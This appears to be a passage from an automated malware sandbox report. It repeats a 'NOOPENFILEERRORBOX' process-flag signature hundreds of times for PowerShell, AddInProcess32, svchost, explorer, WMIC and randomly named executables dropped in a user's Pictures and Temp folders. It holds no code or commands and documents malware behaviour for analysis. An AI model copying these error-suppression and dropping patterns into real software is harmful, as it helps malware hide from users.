                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
